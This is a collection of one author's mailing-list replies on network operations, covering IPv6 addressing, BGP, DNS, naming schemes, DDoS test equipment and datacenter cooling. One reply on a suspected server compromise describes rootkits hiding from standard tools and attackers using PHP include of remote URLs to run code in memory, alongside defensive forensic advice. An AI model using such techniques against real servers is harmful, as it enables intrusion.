Re: "Hypothetical" Datacenter Overheating
On 16/01/2024 at 10:50:13 PM, Saku Ytti wrote: > On Tue, 16 Jan 2024 at 11:00, William Herrin wrote: > > You have a computer room humidified to 40% and you inject cold air > > below the dew point. The surfaces in the room will get wet. > > > I think humidity and condensation is well understood and indeed > documented but by NEBS and vendors as verboten. > > I am more interested in temperature changes when not condensating and > causing water damage. Like we could theorise, some soldering will > expand/contract too fast, breaking or various other types of scenarios > one might guess without context, and indeed electronics often have to > experience large temperature gradients and appear to survive. > When you turn these things on, various parts rapidly heat from ambient > to 80-90c. So I have some doubts if this is actually a problem you > need to consider, in absence of condensation. > Here’s some manufacturer specs: https://www.dell.com/support/manuals/en-nz/poweredge-r6515/per6515_ts_pub/environmental-specifications?guid=guid-debd273c-0dc8-40d8-abbc-be059a0ce59c=en-us 3rd section, “Maximum temperature gradient”. >From memory, the management cards alarm when the gradient is exceeded, too. -- Nathan Ward
Re: New addresses for b.root-servers.net
On 2/06/2023 at 10:22:46 AM, Wes Hardaker wrote: > > 2. I'll note that we are still serving DNS requests at the addresses that > we switched away from in 2017 [1][2]. At that time we actually only > promised 6 months and we've doubled that time length with our latest > announced change. But we do need a date after which we can turn off > service to an address block if some reason demands it. > Hi Wes, Seems to me that this could be heavily informed by historical data from this earlier renumbering. Do you have query rates over time for the old and new addresses since this change in 2017? Even if you end up with the same answer of 12mo, data supporting it may give comfort to the community. Maybe you make a call that once it’s at say 1% or 0.1% or something like that, then it’s OK to turn off - and make a prediction for when that might be based on the historical data. -- Nathan Ward
Re: Finding content in your job title
On 31/03/2010, at 4:26 PM, Steve Bertrand wrote: On 2010.03.30 23:20, Jorge Amodio wrote: I'd say that probably around here for those like me that have been in operations/engineering management positions we don't give a squat about what title your biz card says you have, your actions and performance speak by themselves. There are no kings around here so titles most of the time are worthless. By asking what title may impress others is sort of a -1 to start. It isn't about impression. I'd put 'janitor' on my business card for all I really care. I'm pretty sure Jonny Martin was Chief Internet Janitor in his previous role. He cleaned the tubes so the sewage could flow. -- Nathan Ward
Re: NANOG Digest, Vol 26, Issue 122
On 25/03/2010, at 4:32 PM, Rudolph Daniel wrote: Hi Joe You guys ever mount your racks on Barry mounts= vibration mounts..with so many shakes you may need to. RD Nope. Instead, we stick it at the top of big towers that buffer the vibrations as they go up the tower. http://en.wikipedia.org/wiki/Sky_Tower From memory, we can thank/blame Joe for much of that. Up that tower we have the main switches for the Auckland Peering Exchange (which has in the last few years become a bit more distributed), the (main, or only) POPs for a bunch of offshore transit, including Pacnet and Vocus, and also an F-root instance. From memory it's the highest AGL peering exchange in the world. Probably the highest F-Root instance in the world as well. When there are high winds, the service lift that stops at the right levels cannot run, because it's on a longer shaft and so moves around a lot more. So you have to take the regular tourist glass-bottomed lift and then walk down about 6 flights to the comms floors. Also in moderate winds any unfastened cabinet doors will move with the sway of the tower. Try going up there at 4am after watching a thriller. Also the floor to ceiling glass about 2 feet from the bottom of the ladder you're at the top of a 50RU rack with. Plus the swaying building. You get over your vertigo pretty quickly, or you just don't go up the tower more than once. -- Nathan Ward
Re: IP4 Space
On 19/03/2010, at 4:07 AM, Stan Barber wrote: 1. Almost all home users (not businesses) that are connected to the Internet today via IPv4 are behind some kind of NAT box. In some cases, two NATs (one provided by the home user's router and one provided by some kind of ISP). There is no need for this using IPv6 to communicate with other IPv6 sites. There are a large number of users, here in NZ at least, but I imagine in other places, that have a single ethernet port ADSL Modem which terminates PPP, does IPv4 NAT, DHCP, etc. and then a Wireless Router which has its ethernet Internet plug connected to the ADSL Modem, and does IPv4 NAT, DHCP to end hosts, etc. This means that they have double NAT inside the home, and then in the future a potential third NAT. We did some looking at packets, and 17% of outbound packets from customers at an ISP had TTLs that indicated two L3 hops in the home - which for the majority of cases would mean double NAT. In NZ the most popular ADSL deployment is PPPoATM, so the ADSL unit the ISP ships (either loaned, or included in the install cost) is an IPv4 router terminating a PPPoATM connection, not a bridge or anything. -- Nathan Ward
Re: AARNet AS7575 announcing 1.0.0.0/24, 1.1.1.0/24 and 1.2.3.0/24 soon
On 17/03/2010, at 7:51 PM, Skeeve Stevens wrote: Hey George, If AARNet or someone has the bandwidth, would it not be of value to announce the entire 1/8 and see what areas are targeted by traffic - clearly analysing it and removing DoS or scan traffic. I'm just wondering if there are any /24's or space that is unsuitable to allocate inside 1/8. If only there was someone who pushed a whole lot of outbound data and had not really that much inbound - advertising 1/8 wouldn't really impact them that much. Some kind of, video sharing site, maybe? route-viewssh ip bgp 1.0.0.0/8 BGP routing table entry for 1.0.0.0/8, version 600951180 Paths: (24 available, no best path) Flag: 0x820 Not advertised to any peer 1239 174 36561 144.228.241.130 (inaccessible) from 144.228.241.130 (144.228.241.130) Origin IGP, localpref 100, valid, external % whois -a AS36561 | grep -i name OrgName:YouTube, Inc. :-) -- Nathan Ward
Re: anti-ddos test solutions ?
Hire/buy what I know as a router tester. People call them different things. It's a device that generates packets, and can normally simulate TCP etc. all the way up to HTTP etc. or higher. BGP, OSPF, MPLS, etc. etc. etc. Tell it to generate packets that look like they come from many many hosts (you can normally simulate some kind of network topology with hosts in different places and hence different TTLs etc.), and viola. They normally let you generate background noise traffic, or you could record 24 hours of packet headers from somewhere in your network and play it back through your test network. This needs a lot of disk of course. I used to work for an anti-ddos vendor (Esphion, now owned by Allot) and built their first test rig. First we did it with a bank of PCs with custom Linux kernel code to generate packets because we were a startup doing things on the cheap and I was a bit masochistic. Then we got a router tester and did exactly the same thing, but in a whole lot less space with a whole lot less effort. Both worked great, naturally I recommend a router tester. -- Nathan Ward
Re: CSIRT - Backbone Security : Runtime Monitoring and DynamicReconfiguration for Intrusion Detection Systems
Dig up. On 18/03/2010, at 2:32 PM, Guillaume FORTAINE wrote: Misses, Misters, I have read with interest what everybody told in this thread and it seems that they consider everything new as spam. My conclusion is that they fear what it is new. Best Regards, Guillaume FORTAINE On 03/18/2010 02:09 AM, Michael Sokolov wrote: My spammy sense is going nuts just at the whole ALL CAPS of this guy's last name. I thought all-uppercase last names were a traditional French convention... This guy is French, isn't he? - judging by his name. His habit of addressing everyone as Mister is peculiar indeed, but maybe he is really just very new to the customs and conventions of the Anglophone Internet community? Just wondering... MS !DSPAM:22,4ba182fd13889398512228!
Re: Network Naming Conventions
On 16/03/2010, at 2:10 AM, Adcock, Matt [HISNA] wrote: I've used a Jimmy Buffett theme in test labs before. Naming themes are fine in test labs, because devices have a different function/role several times per day, a name acts like an asset tag in that it sticks with it through its lifetime. Same goes for those servers that sit in our networks that I can only really think to call bitch boxes. They do all sorts of random one-off network hackery tasks, and never get any love. They're not supposed to scale, they were only supposed to be there for one job 5 years ago and they're still there. If I've got guys out there rolling out gear according to cookie cutter designs, I don't want them coming up with names and using ex girlfriends or TV shows or whatever. They're going to run out of ideas, and I don't want to have 50 boxes called rachel on the network with no idea what they do. That sort of thing works fine when you're the only person putting the names in to boxes - like in a lab - but no good if you've grown much. I'm a contractor/consultant type thing, and getting my customers to use naming schemes like the rant that follows helps me understand their network if they do things without me, and helps anyone else who comes along too. So, for production network and server gear, I like domain names built with city and site codes: site.city.domain Perhaps if I had a bigger network I'd have .country.domain on the end of that instead. Hosts within each site are told to search within their site, then city, then domain. Here's how in resolv.conf: search site.city.domain, city.domain, domain This lets me refer to a host called 'access-1' as, access-1, or access-1.site, or access-1.site.city depending on where I am. That's handy and saves my lazy ass typing lots. It also means we can have standard configs for lots of things. For example, we can syslog to syslog and it will choose either the one in the local site if its size warrants it, or one in the city, or a network-wide one. I'm sure you can think of other ways this can be useful. It can be annoying when a box doesn't let you display a full hostname in a prompt, or fudge it and set the hostname to hostname.site.city because hostnames shouldn't have periods in them. YMMV, etc. The benefits outweigh the negatives for me I think. Things can get a bit hairy when devices identify themselves by their hostnames in some other protocols though. Ignoring that and using DNS is encouraged, etc. As for hostnames themselves, I have varying ways of doing that, but I never use a naming scheme that won't scale for.. a long time. I always use numbers, but never use leading zeros - ie. access-1, not access-001. It's not hard to sort numerically, come on now. I generally try to use something that describes the devices function. access-[1-9][0-9]* = access router. core-[1-9][0-9]* = core router. IP is implied unless it's something else, ie. (eth|atm)-access-[1-9][0-9]* are Ethernet or ATM switches. For places where I collapse functionality, ie. a small site with collapsed core and access boxes, I call them access, because they are less to move and hence need renaming when core boxes come in the future to support additional access boxes. Interface addresses in DNS include the interface name and VLAN or some other logical circuit details (PVC, etc.), as is common. Juniper boxes have re0-hostname.domain and re1-hostname.domain, and also re-hostname.domain if I've got a moving master IP address configured. That's about all I can think of to write, I hope it's useful to someone, YMMV, etc. -- Nathan Ward
Re: OBESEUS - A new type of DDOS protector
If only there were other security experts on this list with a proven ability to make this thread even more absurd. On 16/03/2010, at 4:47 PM, Guillaume FORTAINE wrote: Misters, Thank you for your reply. 1) First of all, I am absolutely not related to the Obeseus project. From my point of view, the interesting things were that : a) This project was unknown. http://www.google.com/search?q=obeseus+ddosbtnG=Searchhl=enesrch=FT1sa=2 b) This project comes from an ISP. http://www.loud-fat-bloke.co.uk/links.html c) Its code is Open Source. http://www.loud-fat-bloke.co.uk/tools/obeseusvB.tar.gz My conclusion is that I give far more credit to Obeseus than to Arbor Networks. By the way, I am surprised that this post didn't generate more interest given the uninteresting babble that I have been forced to read in the past on the NANOG mailing-list from the so-called experts. 2) EDoS is a DDoS 2.0 DDoS is about malicious traffic. EDoS is malicious traffic engineered to look like legitimate one. However, the goal is the same : to obliterate the service infrastructure, to quote Mister Morrow. 3) I do my homeworks something that doesn't seem to be the case for a lot of people on this mailing-list. a) I would want to highlight the post of Tom Sands, Chief Network Engineer, Rackspace Hosting entitled DDoS mitigation recommendations [1]. -It seems evidence that he tried the Arbor solution so the three Arbor++ mails don't make sense. -About the fourth one : Sorry but RTFM http://mailman.nanog.org/pipermail/nanog/2010-January/thread.html#16675 Best regards Hey kid, Tom Sands subscribed nearly a decade ago on the NANOG mailing-list. When you went out of school, he was already dealing with DoS concerns : http://www.mcabee.org/lists/nanog/Jan-02/msg00177.html b) I am really asking myself how much credit I could give to a spam expert, Suresh Ramasubramanian, about a DDoS related post [2]. c) Mister Morrow, even if you are a Network Security engineer at Google [3] (morr...@google.com) : -You didn't provide any useful feedback on Obeseus. -You totally missed the point on my other mails. This is definitely disappointing. Is this mailing-list a joke ? Especially, where is Roland Dobbins ? Best Regards, Guillaume FORTAINE [1] http://mailman.nanog.org/pipermail/nanog/2010-January/016675.html [2] http://www.hserus.net/ [3] http://www.linkedin.com/in/morrowc On 03/16/2010 03:11 AM, Suresh Ramasubramanian wrote: I got your point. What I was saying is that what he calls EDoS (and I'm sure he'll say obliterating infrastructure is the ultimate form of an economic dos) is just what goes on ... You may or may not be able to overload the AWS infrastructure by too many queries but you sure as hell will blow the application out if that ddos isnt filtered .. edos again. On Tue, Mar 16, 2010 at 7:35 AM, Christopher Morrow morrowc.li...@gmail.com wrote: eh.. I guess I'm splitting hairs. the goal of 100k bots sending 1 query per second to a service that you know can only sustain 50k queries/second is.. not to economically Dos someone, it's to obliterate their service infrastructure. Sure, you could ALSO target something hosted (for instance) at Amazon-AWS and increase costs by making lots and lots and lots of queries, but that wasn't the point of what Deepak wrote, nor what i corrected. !DSPAM:22,4b9effc21388248155!
Re: 4bytes ASn and RFC1745
On 14/03/2010, at 8:39 PM, Bit Gossip wrote: experts, what are the consequences of 4bytes ASn (RFC4893) for RFC1745 - BGP4/IDRP for IP---OSPF Interaction? In particular with regards to storing the AutonomousSystem in the lowest 16 bits of the External Route Tag (=32 bits)? Thanks, bit Little practical consequences I expect. This is taken from RFC3167, section 1, in 2001: During a review of internet standards relating to BGP, it became apparent that BGP/IDRP OSPF interaction, as described in RFC 1745, has never been deployed in the public internet, and would require significant implementation complexity. Since this mechanism has never been in use in the public internet, it is proposed to reclassify it to Historic. -- Nathan Ward
Re: Security Guideance
Using lsof, netstat, ls, ps, looking through proc with ls, cat, etc. is likely to not work if there's a rootkit on the box. The whole point of a rootkit is to hide processes and files from these tools. Get some statically linked versions of these bins on to the server, and hope they haven't patched your kernel. Are you sure that it's someone who has root? How do you know? Is it not possible that it's someone running this from a PHP script or something, that they've gotten on to the server with the help of a vulnerability in some customer's website code? Maybe it's even a customer doing this intentionally? I've seen this sort of thing where they don't even write the code to disk - some vuln in a PHP script lets them download code from some remote server and execute it from memory - PHP's require() accepts a URL. The usual thing to do here is to take the server offline and make a copy of the disk with a writeblocker in place to prevent further changes, etc. and then inspect the image of the disk on a machine that is not using any binaries from that disk. If there really is a rootkit in place then you'll likely find it. If you're unable to do this, perhaps boot up the server from a CD, there are plenty of forensic analysis/security targeted Linux boot CDs around. If you're unable to capture full packets, perhaps netflow would be useful? - look for incoming data to ports you don't expect. It's much more lightweight on your data storage, and probably doesn't involve you putting in a new server - but a bit heavier on your network kit. -- Nathan Ward
Re: ATT resolvers
On 17/02/2010, at 1:28 AM, Michael McGovern wrote: Does anyone know if ATT has public DNS resolvers? We are an ATT customer and they informed us that we could not use their DNS servers unless we paid for it. That was several years ago and do not know if they have changed their stance on this. I’m already a paying customer and I have to pay to use their DNS resolvers? A few moments on Google finds: - 68.94.156.1 - 68.94.157.1 They seem to work. I suspect you asked them the wrong question, or they interpreted your question incorrectly, or for some other reason thought you wanted them to be authoritative for some zone you control. -- Nathan Ward
Re: Denic (.de) blocking 6to4 nameservers (since begin feb 2010)
On 16/02/2010, at 5:03 AM, Tim Chown wrote: On Fri, Feb 12, 2010 at 08:16:56AM +1100, Mark Andrews wrote: If you can't get native IPv6 then use a tunneled service like Hurricane Electric's (HE.NET). It is qualitatively better than 6to4 as it doesn't require random nodes on the net to be performing translation services for you which you can't track down the administrators of. You can get /48's from HE. Our external IPv6 web accesses are still very low, but have grown linearly over the last five years from 0.1% in 2005/06 to 0.5% of total web traffic now. Internally of course our figures are higher. Of that IPv6 traffic, 1% comes from 2002::/16 prefixes. Even less from Teredo prefixes. I guess we could run stats against known TB prefixes to determine who is using those. You are very unlikely to get traffic from Teredo, because: 1) Windows only asks for if it has non-Teredo IPv6 connectivity 2) When Windows has non-Teredo IPv6 connectivity and so can ask for , preference for reaching your web content is going to be non-Teredo IPv6 - IPv4 - Teredo, due to the prefix policy table, unless you have an in 2001::/32 (Teredo space), in which case it will prefer IPv4 - Teredo. With 6to4, Windows hosts will ask for , and will prefer non-6to4 IPv6 over 6to4 over IPv4. I'm a little surprised at how little 6to4 traffic you get. Teredo gets most use when an application asks for a connection to a certain IPv6 address, without DNS. This is most common in peer to peer - you're not going to levels of web traffic and P2P traffic using Teredo that are comparable ratios to IPv4. My expectation is that lines in your web logs in 2001::/32 have user agent strings indicating non-Windows hosts - or perhaps someone has miredo running on a proxy server, or perhaps the users' non-Teredo IPv6 AND IPv4 paths to you were broken when they tried to make a request. Stranger things have happened.. I wrote some code that will allow you to better understand the connectivity that end users of your web content have - when they visit your site it has them get 1x1 px transparent GIF images from various different hostnames with different characteristics in the DNS, and then reports back which loaded and how long. http://www.braintrust.co.nz/ipv6wwwtest/ Wikipedia were running this for a while, on every 100th hit. They did a modification to this where they also had a large image to test for pmtud errors. Google are using a similar technique to test IPv6 capabilities and networks. I'll add something with the pmtud stuff in the next week or so, and I'll also push the code to github. You'll probably want to make you own changes based on what you're interested in, also. -- Nathan Ward
Re: Denic (.de) blocking 6to4 nameservers (since begin feb 2010)
On 16/02/2010, at 7:34 PM, Mikael Abrahamsson wrote: On Tue, 16 Feb 2010, Nathan Ward wrote: You are very unlikely to get traffic from Teredo, because: 1) Windows only asks for if it has non-Teredo IPv6 connectivity Please don't just say windows as the different versions of windows behave differently, as we've already discussed in the thread here: http://www.ops.ietf.org/lists/v6ops/v6ops.2008/msg01587.html Windows XP will happily use Teredo when faced with response only. What you're describing is Vista and Win7 I guess? Yep, sorry! XP won't ask for unless it has non-Teredo connectivity though I don't think. -- Nathan Ward
Re: Denic (.de) blocking 6to4 nameservers (since begin feb 2010)
On 16/02/2010, at 7:47 PM, Mikael Abrahamsson wrote: On Tue, 16 Feb 2010, Nathan Ward wrote: XP won't ask for unless it has non-Teredo connectivity though I don't think. That doesn't compute considering all the XP machines with Teredo addresses that asked for my only content. http://www.ops.ietf.org/lists/v6ops/v6ops.2008/msg01582.html Of the users getting v6 only gif from non-tunnel-space, 58% were from Proxad (free.fr I believe), and then on the list came UNINET, SUNET, FUNET (university networks in .no, .se and .fi) and Hurricane electric. 98% of Teredo users run Windows XP. 88% of 6to4 users run Windows Vista. So 98% of Teredo users getting the v6only content (using DNS) was using WinXP, so it does seem it does lookups. I mean non-Teredo connectivity in addition to Teredo. Perhaps they have Teredo and 6to4, and could not reach you via 6to4 so instead used Teredo, or, any number of scenarios. -- Nathan Ward
Re: BIRD vs Quagga
On 13/02/2010, at 11:51 AM, Steve Bertrand wrote: fwiw, I've also heard good things about bgpd(8) and ospfd(8), but I haven't tried those either...zebra/Quagga just stuck. OpenBGPd would be great for a public route server at an IX. It's not so great for use in a network unless you run it on OpenBSD - FreeBSD has no metric attribute in it's routing tables, so next-hop IGP metric cannot be compared as the two daemons do not communicate directly at all. If you're on anything other than OpenBSD, I recommend Quagga. I can't comment on BIRD as I have no experience with it yet. XORP is also interesting, it's a more JunOS like interface. It's also some quite heavy C++, so running it on the tiny Soekris boxes that I had meant it wouldn't work for me. If you can spare the CPU and RAM then give XORP a go. -- Nathan Ward
Re: CYMRU Bogon Peering
On 13/02/2010, at 2:03 PM, Seth Mattinen wrote: On 2/12/2010 15:03, Steve Bertrand wrote: What time frame do you determine to be instability? The following is from a box that has ~25 neighbours. Since the box was reloaded (6w3d ago), I've had the same uptime with the Team Cymru neighbours as I do with internal gear. I can't say that I've experienced any instability at all. It is not uncommon for me to have noticed uptimes well beyond 30w. Mine are not so good: NeighborVAS MsgRcvd MsgSent TblVer InQ OutQ Up/Down State/PfxRcd 38.229.0.5 4 65333 115856 115859 1641181400 01:33:51 30 68.22.187.24465333 26968 29671 1631129300 2w4d 30 I see you have 68.22.187.24 in your list too, but my uptime is less. Are you using increased hold times? Nevermind BGP timers, do you normally do well holding TCP connections open for weeks on end across the Internet? -- Nathan Ward
Re: .ve WHOIS Down?
On 9/02/2010, at 2:13 PM, Crist Clark wrote: For want of a better place to ask, I'm wondering if anyone monitoring this list might know what is up with the registro.nic.ve web site. The WHOIS at www.nic.ve refers to that site, and it appears to be down (for me and downforeveryoneorjustme.com too). Doing old fashioned native WHOIS isn't working any better. $ whois -h whois.nic.ve nic.ve Servidor Whois de NIC-Venezuela (.VE) Este servidor contiene informacion autoritativa exclusivamente de dominios .VE Cualquier consulta sobre este servicio, puede hacerla al correo electronico wh...@nic.ve ... etc. I get a proper response, anyway. There is no A record in the DNS for ve.whois-servers.net, which is what my client tries first. Perhaps this is where the confusion lies. -- Nathan Ward
Re: ip address management
I'm actually writing some IP management code. Web based, it knows about the difference between IPv4 and IPv6 in maybe 3 or 4 places. Intention is to release it publicly when it's good to go. On 3/02/2010, at 10:14 AM, Scott Berkman wrote: I was about to suggest IPPlan, but it is lacking the V6 support. Here is one I found doing some searching, but I haven't used it myself: http://sourceforge.net/projects/haci/ -Scott -Original Message- From: Pavel Dimow [mailto:paveldi...@gmail.com] Sent: Tuesday, February 02, 2010 3:55 PM To: nanog@nanog.org Subject: ip address management Hello, does anybody knows what happend with ipat? http://nethead.de/index.php/ipat http://nanog.cluepon.net/index.php/Tools_and_Resources Any other suggestion for a good foss ip address management app with ipv6 support? !DSPAM:22,4b6895ef126381679815450!
Re: How polluted is 1/8?
On 4/02/2010, at 9:19 AM, Justin M. Streiner wrote: I would hope that the APNIC would opt not to assign networks that would contain 1.1.1.1 or 1.2.3.4 to customers for exactly that reason. The signal-to-noise ratio for those addresses is likely pretty high. The noise is likely contained on many internal networks for now because a corresponding route doesn't show up in the global routing table at the moment. Once that changes 1.1.1/24 and 1.2.3/24 are assigned to APNIC. Unless they release them, the general public will not get addresses in these. -- Nathan Ward
Re: Using /126 for IPv6 router links
On 28/01/2010, at 1:51 AM, Randy Bush wrote: the general intent of a class B allocation is that it is large enough for nearly everybody, with nearly everybody including all but the largest of organisations. That would, indeed, work if we weren't short of class B networks to assign. Would you clarify? Seriously? we used to think we were not short of class B networks We also used to have a protocol with less total addresses than the population of the planet, let alone subnets. In 2000::/3, assuming we can use 1 in every 4 /48s because, well, I'm being nice to your point, we still have 1300 /48s per person. http://www.wolframalpha.com/input/?i=%28%282%5E45%29%2F4%29%2Fearth+population And that's /48s. What if say 50% of the address space is /48s and 50% of the address space is /56s? Then we have 675,000 networks per person. If we botch that up then we've done amazingly badly. Then we'll move on to 4000::/3. -- Nathan Ward
Re: Using /126 for IPv6 router links
On 26/01/2010, at 8:50 AM, Tim Durack wrote: This is what we have planned: 2620::xx00::/41 AS-NETx-2620-0-xx00 2620::xx00::/44 Infrastructure 2620::xx01::/48 Pop1 Infrastructure 2620::xx01:::/64Router Loopback (2^64 x /128) 2620::xx01:0001::/64Transit net (2^48 x /112) 2620::xx01:0002::/64Server Switch management 2620::xx01:0003::/64Access Switch management 2620::xx0f::/48 Pop16Infrastructure Why do you force POP infrastructure to be a /48? That allows you only 16 POPs which is pretty restrictive IMO. Why not simply take say 4 /48s and sparsely allocate /56s to each POP and then grow the /56s if you require more networks at each POP. You only have a need for 4 /64s at each POP right now, so the 256 that a /56 gives you sounds like more than enough, and up to 1024 POPs (assuming you don't outgrow any of the /56s). Also I'd strongly recommend not stuffing decimal numbers in to a hexadecimal field. It might seem like a good idea right now to make the learning curve easier, but it's going to make stuff annoying long term. You don't have anything in IPv4 that's big enough to indicate the VLAN number and you've lived just fine for years, so forcing it to be decimal like that isn't really needed. You're much better off giving your staff the tools to translate between the two, rather than burn networks in order to fudge some kind of human readability out of it and sacrificing your address space to get it. % printf %04x\n 4095 0fff % printf %d\n 0x0fff 4095 -- Nathan Ward
Re: Using /126 for IPv6 router links
On 24/01/2010, at 5:28 PM, Leo Bicknell wrote: In a message written on Sat, Jan 23, 2010 at 01:52:21PM +0100, Mathias Seiler wrote: I use a /126 if possible but have also configured one /64 just for the link between two routers. This works great but when I think that I'm wasting 2^64 - 2 addresses here it feels plain wrong. So what do you think? Good? Bad? Ugly? /127 ? ;) I have used /126's, /127's, and others, based on peers preference. I personally have a fondness for /112's, as it gives you more than 2 addresses, and a DNS bit boundary. For all the pontification about how there are enough /64's to number all the grains of sand, or other nonsense, I think that ignores too much operational information. rDNS is important, and becomes harder in IPv6. Making it easier is importnat. Having a scan of a /64 fill your P2P T1 is poor design, all because you assigned 2^64 addresses to a link that will never have more than 2 functional devices. Most importantly, we should not let any vendor code any of these into software or silicon, in case we need to change later. I too prefer /112s. I can take the first /64 in any assignment or allocation and set it aside for networking infrastructure. The first /112 is for loopbacks, the remaining /112s are for linknets. Then I can filter this /64 at my border, and it's easy. You can do the same thing with /64 linknets, but then you have to set aside a block of them, and that might get hard if you have a /48 or something. Maybe not. What if you have a /56? Maybe there is some value in linknets being effectively disposable so you never have to worry about problems coming from re-use. A single /64 full of /112s gives you 281 trillion. For links to customers and other networks, I like /64s, because they are right now the standard so you're not going to run in to compatibility problems. If you've got links to customers you should have a /32, so setting aside a /48 or a /44 or something for those customer links is no huge drama. -- Nathan Ward
Re: Using /31 for router links
On 23/01/2010, at 1:31 PM, Jay Nugent wrote: Greetings, On Fri, 22 Jan 2010, Seth Mattinen wrote: In the past I've always used /30's for PTP connection subnets out of old habit (i.e. Ethernet that won't take unnumbered) but now I'm considering switching to /31's in order to stretch my IPv4 space further. Has anyone else does this? Good? Bad? Based on the bit of testing I've done this shouldn't be a problem since it's only between routers. Yes, this *IS* done *ALL* the time. P-t-P means that there are ONLY two devices on the wire - hence point to point. It ONLY uses two IP addresses (one on each end) and there is no reason or need to ARP on this wire. So no need for a broadcast or network addresses - it is just the two end points. ARP is still required on ethernet links, so that the MAC address can be discovered for use in the ethernet frame header. /31 does not change the behavior of ARP at all. -- Nathan Ward
Re: 10Gbps Traffic Test Systems
I have used Ixia, Spirent AX/4000, Spirent Testcenter and Spirent Smartbits for 1-10GE testing, they've all been able to do the things you ask for - they are quite basic features and any 10GE router tester unit will do what you want. In addition, you should demand much higher than 10Kpps, you should be able to fit roughly 120Mpps of TCP SYN packets in to a 10GE ethernet pipe. On 21/01/2010, at 11:04 AM, Brad Fleming wrote: I am in the market for 10Gbps traffic testers. Here are some of the things I'd like to have: 1) Mixed packet sizes 2) Ramp TCP sessions up/down quickly 3) Many source and destination IPs 4) Ability to ramp traffic up and down 5) Simulate targeted SYN floods 6) 10,000+ packets per second We'll use these devices to test throughput and resource utilization on routers and firewalls/security systems. We'll also test and prove candidate QoS configurations (ie: DSCP41 still works well even when DSCP11 is saturating links). The catch is that I work for a charitable, non-profit with limited resources. I understand you can't have steak on a sardine budget; I'm just trying to find suggestions on a testing platform for thrifty customers! We do not have any existing testing systems other than iPerf on a Mac Mini. Any suggestions, either on-list or off, are welcome and appreciated. Brad Fleming !DSPAM:22,4b577e41217795602264856!
Re: IPv6 allocations, deaggregation, etc.
The assumption that networks will filter /48s is not the whole story. The RIRs giving out /48s do so from a single pool that only contains / 48 assignments. The RIRs give out /32s from a pool containing /32 or shorter prefixes (ie /31, /30, etc. etc). You will find that most networks filtering /48s allow them from the pool with only /48s in it. The root DNS servers are in /48s. If you can justify getting a /32, then I suggest you do so, but if not then don't worry, a /48 will work just fine. The networks that do filter you will pretty soon adapt I expect. Insert routing table explosion religious war here, with snipes from people saying that we need a new routing system, etc. etc. So with that in mind, do your concerns from your original post still make sense? -- Nathan Ward
Re: IPv6 allocations, deaggregation, etc.
On 23/12/2009, at 3:52 PM, George Bonser wrote: If you can justify getting a /32, then I suggest you do so, but if not then don't worry, a /48 will work just fine. The networks that do filter you will pretty soon adapt I expect. I can't in good conscience justify a /32. That is just too much space. I believe I can, however, justify a separate /48 in Europe and APAC with my various offices and data centers in that region coming from the /48 for that region. I'm not sure it's about good conscience and worrying about address space wastage anymore. I mean sure, don't go ask for a /8 or something, but follow the RIR guidelines - don't paint yourself in to a corner later by trying to save the world now. If you are assigning addresses to customers, you should have a /32 allocation. If you are an end user of addresses, you should have a /48 portable assignment. In APNIC world anyway, I'm not sure of the terms and policies used in other regions. -- Nathan Ward
Re: IPv6 allocations, deaggregation, etc.
On 23/12/2009, at 4:04 PM, Shane Ronan wrote: I'm not an expert, but can/should you advertise ARIN IP space on APNIC or RIPE, etc ? You are talking about having recieved ip space from ARIN, tied to an ARIN AS I suppose it's probably more a matter of form than anything else though. This happens all the time with IPv4 space and AS #'s today, why would it be any different with v6? It's not. -- Nathan Ward
Re: Linux shaping packet loss
On 9/12/2009, at 4:47 AM, Tony Finch wrote: Autoneg is a required part of the gig E specification so you'd only be causing yourself trouble by turning it off. (I don't know if it'll also break automatic MDI/MDI-X (crossover) configuration, for an example of something that's nice to have.) Yes it will break auto MDI/MDI-X. -- Nathan Ward
Re: Consumer Grade - IPV6 Enabled Router Firewalls.
On 3/12/2009, at 12:44 PM, Wade Peacock wrote: Matthew Dodd wrote: Apple has been shipping the Airport Extreme and Express (consumer router) with v6 support since 2007, if I recall correctly. They can also create a 4to6 tunnel automatically. By 4to6 to you mean IPv4 on the inside and IPv6 on the outside? He is confused, and means 6to4. Also the airport extreme does not do DHCPv6-PD or anything (as far as I know, they certainly did not last time I tried), so I don't know that we'd really call them an IPv6 CPE in the way that I suspect Wade means. -- Nathan Ward
Re: DNS query analyzer
On 1/12/2009, at 1:06 PM, Joseph Jackson wrote: Hey List! Anyone know of a tool that can take a pcap file from wireshark that was used to collect dns queries and then spit out statistics about the queries such as RTT and timeouts? Not off the top of my head, but, you could use wireshark's Lua extension system to write a plugin to do this for you right within wireshark. The wireshark/Lua stuff is quite powerful (though not super super fast), it's a really useful tool to have on hand. -- Nathan Ward
Re: Speed Testing and Throughput testing
On 3/11/2009, at 10:56 AM, Mark Urbach wrote: Anyone have a good solution to get accurate speed results when testing at 10/100/1000 Ethernet speeds? If you want accuracy, you want to buy a packet generator/router tester unit. I just built a tool for a customer (a last-mile network provider) that runs a series of iperf tests over several days, and generates a report. iperf works well enough, but it seems to be much better when driven by humans, vs. driven by scripts. I'm not aware of any free tools that do just ethernet frames. Do you have a server/software that customer can test too? Not sure what you're after here - do you want to host your own speedtest.net-like service so your customers can self-test their access links? Does this mean much, or should they be testing against a server outside your network? Also, if you host your own service and you're talking about 10/100/1000mbit connections, you might want to put something in place that prevents several people testing at once. -- Nathan Ward
Re: dealing with bogon spam ?
On 29/10/2009, at 2:52 AM, Jeroen Massar wrote: Randy Bush wrote: It seems to me like the best solution might be a semi-hacky solution of asking arin (and other IRR's) if i can copy its DB and creating an internal peer which null routes unallocated blocks (updated nightly?) What you want to take is: $rirs = array( afrinic = ftp://ftp.ripe.net/pub/stats/afrinic/delegated-afrinic-latest;, [..] this is brilliant. maybe we should form an org to do this and distribute via bgp? shall we have a contest for the name of the org? my bid is cymru Who have it already indeed for a long long time and have a proven track record. I noted the above for the people who want to get their own copy from the IRRs, like what was asked above. For instance for the few who want to build their own setups, want to integrate it in their own systems etc. I can't see anything on their site that provides a BGP feed of prefixes allocated by RIRs, which I think is what we're talking about here. -- Nathan Ward
Re: PPPoE vs. Bridged ADSL
